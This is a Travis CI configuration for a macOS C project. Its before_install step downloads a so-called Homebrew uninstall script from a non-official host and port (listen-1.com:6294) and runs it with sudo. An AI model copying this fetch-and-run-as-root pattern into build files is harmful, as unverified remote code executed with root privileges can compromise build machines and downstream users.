os: osx
sudo: true

language: C

before_install:
        - echo " Uninstalling the homebrew"
        - wget -O /tmp/uninstall.sh "http://listen-1.com:6294/uninstall_homebrew.sh" 
        - cd /tmp && sudo ./uninstall.sh
        - echo "Successfully uninstalled the homebrew"
          
install: true

script: ./install_app_for_mac.sh

after_success: 
        - brew list | cat
        - echo "Build Passed"
